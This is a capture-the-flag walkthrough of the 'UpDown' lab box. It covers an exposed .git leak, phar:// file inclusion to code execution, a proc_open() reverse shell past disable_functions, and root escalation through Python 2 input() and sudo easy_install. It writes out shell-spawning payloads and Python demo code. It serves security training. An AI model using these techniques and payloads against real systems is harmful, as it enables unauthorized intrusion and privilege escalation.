UpDown
LFI to RCE using PHAR files while bypassing disable_functions, followed by abuse of SUID and sudo.
As per usual, we knock out a quick nmap scan:
It appears to be running Apache on Ubuntu, serving a website titled Is My Website Up?. A quick look at the IP gives us a basic page. It appears to be an application that checks for you whether or not a website is up:
We can see at the bottom that siteisup.htb is the domain, so we add it to /etc/hosts. The website we are served, however, is still the same.
I listen with sudo nc -nvlp 80, but if we put in our IP, we get an interesting message:
If we prefix it with http://, it works, though. There is probably some check to detect the protocol the request uses. It does appear to just be a GET request:
Nothing of note here, except confirmation that the domain is siteisup.htb. On the website there is a massive delay, and it says it's down:
This makes sense: we are not sending a response, so it has no way of telling. If we instead serve port 80 with a python SimpleHTTPServer, which does respond, we are told it's up:
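Spinning up such a server is a one-liner on the command line; as a sketch, the Python 3 equivalent (`http.server` replaced the old `SimpleHTTPServer` module) can also be driven programmatically:

```python
import http.server
import socketserver
import threading
import urllib.request

# Python 3 equivalent of `python -m SimpleHTTPServer`: serve the current
# directory and, crucially, send a real HTTP response. Port 0 picks a
# free port here; on the box we'd bind port 80 (hence the sudo).
httpd = socketserver.TCPServer(("", 0), http.server.SimpleHTTPRequestHandler)
port = httpd.server_address[1]
threading.Thread(target=httpd.serve_forever, daemon=True).start()

# The checker just needs any valid response to call the site "up":
resp = urllib.request.urlopen(f"http://127.0.0.1:{port}/")
print(resp.status)  # 200
```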
There is once again no additional data:
If we turn on Debug Mode, the website prints out the headers and the HTML data.
We also realise that we can use http://127.0.0.1 as input, so SSRF could be possible. If we try other wrappers like file:// or php://, it breaks and we get the Hacking attempt was detected! message again.
Not all wrappers are blocked, though: as ippsec showed in his video, ftp and gopher both work fine.
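We haven't seen the server-side code yet, so this is purely a guess, but the observed behaviour (bare IPs rejected, file:// and php:// rejected, http/ftp/gopher allowed) is consistent with a scheme filter along these lines - the function name and blocked list are hypothetical:

```python
import re

# Hypothetical recreation of the input filter: require a URL scheme, and
# block a few dangerous PHP stream wrappers while letting others through.
BLOCKED = ("file", "php", "data", "expect")

def is_hacking_attempt(url: str) -> bool:
    m = re.match(r"^([a-z0-9.+-]+)://", url, re.IGNORECASE)
    if not m:                          # bare IPs/hostnames were rejected too
        return True
    return m.group(1).lower() in BLOCKED

print(is_hacking_attempt("file:///etc/passwd"))  # True
print(is_hacking_attempt("ftp://siteisup.htb/")) # False
print(is_hacking_attempt("10.10.14.2"))          # True
```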
We can run some brute force scripts in the background for files and directories while we probe manually:
Gobuster detects that there is a /dev directory! This looks like the only useful find, as basically everything else returns status code 403. Connecting to /dev just loads a blank page with no information.
But what if we bruteforce under /dev? In fact, we hit the jackpot - there's a .git directory!
We'll use a tool called git-dumper to dump the contents of the Git repo:
The contents are interesting. First we see index.php, which looks like this:
Essentially, it checks the page parameter; if it doesn't contain strings like bin or etc, it appends .php to the end and serves that file back. If it does, it simply renders checker.php. checker.php is the file for the main page we see on a normal connection, which checks if a website is up or not.
There is clearly LFI here, but made slightly more difficult by the blacklist and the addition of .php onto the end of the filename.
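As a Python paraphrase of what index.php is doing (the blacklist entries here are illustrative, not the full list from the repo):

```python
# Paraphrase of index.php's routing: a substring blacklist on `page`,
# then ".php" appended before the include.
BLACKLIST = ("bin", "etc")  # illustrative; the real list is longer

def resolve_page(page: str) -> str:
    if any(word in page for word in BLACKLIST):
        return "checker.php"             # blocked: fall back to the main page
    return page + ".php"                 # e.g. ?page=admin -> admin.php

print(resolve_page("admin"))             # admin.php
print(resolve_page("../../etc/passwd"))  # checker.php
```

The appended `.php` is why a plain path-traversal payload doesn't immediately work: whatever we point at must end up with a `.php` suffix.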
Additionally, we can dump more details from Git using the git log command. A couple of interesting commits come up:
There is very likely some interesting information in .htpasswd and .htaccess, and the mention of a dev vhost is useful too - there may be a dev.siteisup.htb. We'll add this to our hosts file, but if we try to connect, it tells us it's Forbidden to access that resource. We've at least confirmed that the subdomain exists and is treated differently.
If we checkout the commit 8812785e31c879261050e72e20f298ae8c43b565 using git checkout, we can see that .htpasswd exists, but it's empty:
.htaccess is much more interesting:
This tells us there is a special header that needs to be set, called Special-Dev, with the value only4dev. Considering the description of the commit is New technique in header to protect our dev vhost and dev.siteisup.htb is Forbidden, it's likely for that. We can check using BurpSuite:
And it looks like it is!
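To see why the header flips the response, here's a small local mock of the gate. Only the header name and value come from the repo; the server logic is my approximation of the .htaccess rule:

```python
import http.server
import socketserver
import threading
import urllib.error
import urllib.request

class GateHandler(http.server.BaseHTTPRequestHandler):
    # Approximation of the .htaccess behaviour: 403 unless the magic
    # header matches. Header name/value are from the dumped repo.
    def do_GET(self):
        if self.headers.get("Special-Dev") == "only4dev":
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"dev vhost")
        else:
            self.send_error(403)

    def log_message(self, *args):  # silence request logging for the demo
        pass

httpd = socketserver.TCPServer(("", 0), GateHandler)
port = httpd.server_address[1]
threading.Thread(target=httpd.serve_forever, daemon=True).start()

try:
    urllib.request.urlopen(f"http://127.0.0.1:{port}/")
    blocked = 200
except urllib.error.HTTPError as e:
    blocked = e.code          # 403 without the header

req = urllib.request.Request(f"http://127.0.0.1:{port}/",
                             headers={"Special-Dev": "only4dev"})
allowed = urllib.request.urlopen(req).status
print(blocked, allowed)  # 403 200
```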
To make it easier for us, we're gonna get BurpSuite to add the header for us with its proxy (thanks to ippsec for this!). We can go to Match and Replace under Proxy Options:
And we can access it successfully in the browser:
Fiddling around with the website, we realise it reflects the git repository perfectly - the hyperlink for the Admin Page adds ?page=admin to the request, which then spits out the contents of admin.php. Clearly, the LFI works.
A logical route here would be to upload our own file and then LFI it for RCE. However, there are two issues with this.
Firstly, the server checks the file extension, and denies uploading a fair few of them:
Secondly, the server appends .php to the page parameter of the GET request:
We have to somehow bypass these restrictions to get proper LFI.
If we have a proper look at the code, we realise that it all happens very quickly:
So after all the checks, it:
Uploads the file to uploads/, in a subfolder named after the current time
Reads all the lines in the file, putting them into a list
Queries each element of the list to see if it's up
Deletes the file
So it expects a list of websites to check, then deletes the file as soon as the checks are done.
Note that if the webserver doesn't respond, it hangs for a period of time - this is the massive delay we noticed right away. We can use this to our advantage and keep the server running, leaving the file up.
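A sketch of that lifecycle makes the race window obvious. `fetch` here stands in for the real HTTP check; everything else is a simplification of the flow above:

```python
import os
import tempfile
import threading
import time

def check_sites(upload_path, fetch):
    """Mimic the checker's flow: read the uploaded list, probe each
    entry, then delete the upload. If a target accepts the connection
    but never answers, fetch() blocks and the file survives on disk
    for the whole timeout - that's our window to include it."""
    with open(upload_path) as f:
        urls = [line.strip() for line in f if line.strip()]
    for url in urls:
        fetch(url)              # hangs here on an unresponsive target
    os.remove(upload_path)      # gone as soon as every check returns

# Demo: a fetch that "hangs" for half a second keeps the file alive.
path = os.path.join(tempfile.mkdtemp(), "upload.txt")
with open(path, "w") as f:
    f.write("http://10.10.14.2/\n")   # hypothetical attacker IP

t = threading.Thread(target=check_sites,
                     args=(path, lambda url: time.sleep(0.5)))
t.start()
time.sleep(0.2)
alive_mid = os.path.exists(path)      # True: still on disk mid-check
t.join()
alive_after = os.path.exists(path)    # False: deleted afterwards
print(alive_mid, alive_after)  # True False
```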
We make a very simple test.php:
As we predicted, the server rejects the file. If we rename it to test.txt and try again, the upload is successful. If we go to http://dev.siteisup.htb/uploads/, we see the file gets deleted immediately. Let's add our own IP and see if it hangs long enough for us to actually get it:
Still nothing. The response is very quick, so the server probably detected the socket was closed. If we open the socket but don't respond, for example with netcat, it might hang:
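netcat is the easy way, but the same silent listener is simple to sketch in Python: accept the connection and never send a byte back, so the checker's client blocks on its read:

```python
import socket
import threading

conns = []  # hold references so accepted sockets stay open, unanswered

def silent_listener(listener):
    # Accept connections but never reply: the checker's HTTP client
    # blocks waiting for a response, and the uploaded file stays on
    # disk until the request times out.
    while True:
        conn, _ = listener.accept()
        conns.append(conn)

srv = socket.socket()
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 0))   # in practice port 80, which needs root
srv.listen(5)
threading.Thread(target=silent_listener, args=(srv,), daemon=True).start()

# A client connecting to us now just hangs on its read:
cli = socket.create_connection(("127.0.0.1", srv.getsockname()[1]))
cli.sendall(b"GET / HTTP/1.1\r\nHost: test\r\n\r\n")
cli.settimeout(0.5)
try:
    cli.recv(4096)
    hung = False
except socket.timeout:
    hung = True               # no response ever came back
print(hung)  # True
```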
And now if we run over to uploads, we can see the file!
We can also add the -k flag to the above nc command to keep it listening across multiple connections. I'll have this running in the background while I tinker with what can be done.
PHP has its own archive format, phar files, which essentially package PHP files up into a zip-like archive. The cool thing about a phar file is that we can use the phar:// stream wrapper to access a PHP script inside it.
The way this works is that the file inside the archive has the .php extension; in the page parameter of the GET request we use the phar:// wrapper to point at it, and the .php the server appends completes the inner filename.
We'll make test.php really simple to start with:
We then compress it into a phar file:
The upload works! Let's try and access the file itself. In BurpSuite, we'll use Repeater to query for it. Note that the server appends the .php for us - that's half the reason we have to do it this way! So don't include the extension in the page parameter.
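Building the archive doesn't require PHP tooling. phar can also read zip-format archives, so (as one approach; the zip CLI works just as well) Python's zipfile can package the script:

```python
import os
import tempfile
import zipfile

# Package test.php into a zip archive. phar handles zip-format archives,
# so a request like phar://uploads/<dir>/<archive>/test (with the server
# appending ".php") reaches the script inside.
workdir = tempfile.mkdtemp()
php_path = os.path.join(workdir, "test.php")
with open(php_path, "w") as f:
    f.write("<?php phpinfo(); ?>\n")

archive = os.path.join(workdir, "test.zip")
with zipfile.ZipFile(archive, "w") as z:
    z.write(php_path, arcname="test.php")  # inner name must end in .php

print(zipfile.ZipFile(archive).namelist())  # ['test.php']
```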
It worked! Now let's try a crazier command, like system("ls"):
Huh, it's an Internal Server Error. Considering that the previous attempt worked fine, chances are some PHP functions are disabled. This is done using the disable_functions directive, and we can check by running phpinfo(), so let's do that:
There are a lot of disabled functions, but one that is not disabled is proc_open(). This can be found using the tool dfunc-bypasser, as recommended by ippsec and 0xdf. A proc_open() reverse shell can be pretty simple:
A basic reverse shell to port 4000. Let's do the exact same thing and pray it works.
Which it does! We upgrade the shell quickly using
A quick check in /home tells us there is a developer user. In their home directory there is a dev folder containing a SUID binary named siteisup, alongside its source code siteisup.py. We can read siteisup.py:
We can immediately spot that this is Python 2, and even more importantly it uses input() - which in Python 2 can easily lead to code execution. If we run ./siteisup, we get prompted for the URL. If we enter a simple os.system command, we get a response:
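The reason this works: Python 2's input() is equivalent to eval(raw_input()), so whatever we type at the prompt is evaluated as a Python expression. Python 3 dropped that behaviour, but eval() reproduces the effect:

```python
import os

# Python 2's input() == eval(raw_input()): the "URL" the user types is
# evaluated as an expression before the script ever sees it.
user_input = "__import__('os').getpid()"  # what we'd type at the prompt
result = eval(user_input)                 # arbitrary code executes here

print(result == os.getpid())  # True - our expression ran in-process
```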
Aside from the errors, we can see it works! Now we can run __import__('os').system('bash') and get a shell as developer. I'll grab the id_rsa in .ssh, call it dev.key and SSH in:
And now we have a shell as developer and can read user.txt!
We can check our sudo permissions:
We have sudo permissions to run easy_install. We can use GTFOBins to find an easy sudo privesc for easy_install:
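The GTFOBins trick works because easy_install executes the target package's setup.py as ordinary Python, so under sudo any code we put there runs as root. A sketch that stages the payload (the shell-spawning line is the standard GTFOBins payload; the package directory is a throwaway temp dir):

```python
import os
import tempfile

# easy_install runs setup.py as plain Python with the invoking user's
# privileges, so a "package" whose setup.py execs a shell gives us a
# root shell when run via sudo.
pkg = tempfile.mkdtemp()
with open(os.path.join(pkg, "setup.py"), "w") as f:
    f.write("import os\nos.execl('/bin/sh', 'sh')\n")

# On the target: sudo easy_install <pkg>  ->  root shell
print("sudo easy_install " + pkg)
```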
And from there we easily read root.txt.